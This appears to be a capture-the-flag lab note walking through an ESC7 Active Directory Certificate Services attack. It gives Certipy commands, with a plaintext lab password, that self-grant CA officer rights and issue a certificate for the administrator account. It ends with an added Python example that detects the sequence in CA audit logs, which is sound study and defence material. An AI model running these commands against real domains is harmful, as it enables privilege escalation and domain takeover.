
ESC7 - exploit

Exploit a certificate service misconfiguration

One:

certipy req -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

Two:

certipy ca -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-DC01-CA -add-officer raven

Three:

certipy ca -ca manager-DC01-CA -issue-request 19 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

Four:

certipy req -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'

Five:

certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -ca manager-DC01-CA -issue-request 20

Six:

certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236

If authentication fails with "Clock skew too great", sync the local clock with the DC:

timedatectl set-ntp false
sudo ntpdate 10.10.11.236

OR

rdate -n <ip>

Get administrator hash
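
The steps above leave a trail in the CA's audit log: a denied request (event 4888), a permission change granting the officer right (4882), then issuance of the same request ID (4887). The Python below is an added detection example, not part of the original notes or of Certipy, that correlates those events. The record fields (`account`, `right`, `requester`, `upn`, `template`) are an assumed normalized form, and the sample events are constructed.

```python
# Added example (defender side): flag the ESC7 sequence in AD CS audit events.
# Event IDs are the Windows Security log IDs for Certificate Services; the dict
# fields are a constructed, normalized form (assumption), not the raw event XML.
PERM_CHANGED, REQ_ISSUED, REQ_DENIED = 4882, 4887, 4888

def find_esc7(events, window=3600):
    """Alert when a denied request is later issued and its requester gained
    the officer right on the CA within `window` seconds before issuance."""
    officer_grants = {}   # account -> time it last gained the officer right
    denied = {}           # request_id -> denied-request event
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == PERM_CHANGED and ev.get("right") == "officer":
            officer_grants[ev["account"].lower()] = ev["ts"]
        elif ev["id"] == REQ_DENIED:
            denied[ev["request_id"]] = ev
        elif ev["id"] == REQ_ISSUED and ev["request_id"] in denied:
            req = denied.pop(ev["request_id"])
            requester = req["requester"].lower()
            granted_at = officer_grants.get(requester)
            if granted_at is None or not 0 <= ev["ts"] - granted_at <= window:
                continue  # issued after denial, but no recent self-grant
            alerts.append({
                "request_id": ev["request_id"],
                "requester": requester,
                "template": req["template"],
                # a requester asking for another principal's UPN raises severity
                "upn_mismatch": req["upn"].lower() != requester,
            })
    return alerts

# Constructed sample events mirroring the order of the steps on this page.
SAMPLE = [
    {"id": 4888, "ts": 100, "request_id": 19, "requester": "raven@manager.htb",
     "template": "SubCA", "upn": "administrator@manager.htb"},
    {"id": 4882, "ts": 160, "account": "raven@manager.htb", "right": "officer"},
    {"id": 4887, "ts": 220, "request_id": 19},
    # Benign: denied request later issued, requester never gained officer right
    {"id": 4888, "ts": 300, "request_id": 21, "requester": "alice@manager.htb",
     "template": "User", "upn": "alice@manager.htb"},
    {"id": 4887, "ts": 400, "request_id": 21},
]

if __name__ == "__main__":
    for alert in find_esc7(SAMPLE):
        print(alert)
```

These events are only written when auditing is enabled on the CA, so confirm that before relying on the correlation.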
